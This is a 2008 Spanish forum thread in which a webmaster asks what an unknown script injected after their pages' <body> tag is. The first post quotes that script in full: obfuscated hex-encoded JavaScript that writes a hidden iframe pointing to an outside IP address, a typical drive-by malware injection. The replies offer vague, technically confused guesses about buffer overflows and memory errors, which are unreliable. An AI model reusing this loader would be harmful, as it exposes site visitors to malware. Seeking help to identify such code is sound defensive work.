Foros del Web » Programando para Internet » Javascript »

Script malicioso?

 Estas en el tema de Script malicioso? en el foro de Javascript en Foros del Web. Holas como andan, tengo un problema serio con dos paginas webs. A una web google me la indexo como "este sitio puede dañar su equipo" ...
  #1 (permalink)  
Antiguo 07/05/2008, 06:24
Avatar de elias77  
Fecha de Ingreso: noviembre-2005
Ubicación: Buscame...
Mensajes: 1.051
Antigüedad: 18 años, 5 meses
Puntos: 11
Exclamación Script malicioso?
Holas como andan, tengo un problema serio con dos paginas webs. A una web google me la indexo como "este sitio puede dañar su equipo" y tengo otra que recien entre y me puso un cartel de advertencia que decia "End of PDF exploit CollectEmailInfo" me fijo en el codigo fuente de la pagina dese el explorador y seguido de la etiqueta <body> tengo este script que nunca puse yo.
Cita:
<script>function v481fddccdb56e(v481fddccdb972){ var v481fddccdbd7d=16; return(parseInt(v481fddccdb972,v481fddccdbd7d));}f unction v481fddccdec9d(v481fddccdf48f){ var v481fddcce28fa=2; var v481fddcce045a='';for(v481fddcce1edf=0; v481fddcce1edf<v481fddccdf48f.length; v481fddcce1edf+=v481fddcce28fa){ v481fddcce045a+=(String.fromCharCode(v481fddccdb56 e(v481fddccdf48f.substr(v481fddcce1edf, v481fddcce28fa))));}return v481fddcce045a;} document.write(v481fddccdec9d('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D313 7366261207372633D5C27687474703A2F2F37372E3232312E3 133332E3135302F2E69662F676F2E68746D6C3F272B4D61746 82E726F756E64284D6174682E72616E646F6D28292A3531393 936292B2739306335353363355C272077696474683D3631392 06865696768743D3834207374796C653D5C27646973706C617 93A206E6F6E655C273E3C2F696672616D653E27293C2F53435 24950543E'));</script>
Alguien tiene idea de que se trata ese script?
__________________
You're face to face, with the man who sold the world - NIRVANA
Diese stadt ist eine Dirne, hat rote flecken auf der Stirn - RAMMSTEIN
  #2 (permalink)  
Antiguo 07/05/2008, 07:23
Avatar de elias77  
Fecha de Ingreso: noviembre-2005
Ubicación: Buscame...
Mensajes: 1.051
Antigüedad: 18 años, 5 meses
Puntos: 11
Re: Script malicioso?
Segun lo que estbe leyendo eso provoca un desbrodamiento de buffer, es decir trata de copiar en memoria, caracteres en un espacio donde no entra. Igual no estoy seguro que sea eso. Espero que me puedan ayudar
__________________
You're face to face, with the man who sold the world - NIRVANA
Diese stadt ist eine Dirne, hat rote flecken auf der Stirn - RAMMSTEIN
  #3 (permalink)  
Antiguo 07/05/2008, 19:39
Avatar de elias77  
Fecha de Ingreso: noviembre-2005
Ubicación: Buscame...
Mensajes: 1.051
Antigüedad: 18 años, 5 meses
Puntos: 11
Re: Script malicioso?
Nadie sabe si ese script es un scritp malicioso?? o al menos si provoca un desbordamiendo del buffer o que provoca. Ademas se coloca solo despues de subido el html, es decir que no se que hacer pasa sacarlo
__________________
You're face to face, with the man who sold the world - NIRVANA
Diese stadt ist eine Dirne, hat rote flecken auf der Stirn - RAMMSTEIN
  #4 (permalink)  
Antiguo 09/05/2008, 04:51
 
Fecha de Ingreso: septiembre-2005
Mensajes: 840
Antigüedad: 18 años, 7 meses
Puntos: 84
Re: Script malicioso?
El error que dices, se llama "Error de Proteccion de Memoria" y como bien dices, salta cuando una Aplicacion, por ejemplo Firefox, intenta entrar en la memoria asignada a, por ejemplo, outlook, para copiar datos de este programa y usarlos en tu contra.

Si te salta eso, supongo que si sera un codigo malicioso, d todas formas, lo unico que te puedo decir viendo ese codigo, es que esta ofuscado o algo asin xDDD


Mientras te salte el error, significa que no se ha llevado a cabo el exploit, si no te saltara el error, significaria que ha podido copiar la memoria de otro programa para su propio interes
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta


« Tema Anterior | Próximo Tema »


La zona horaria es GMT -6. Ahora son las 03:47.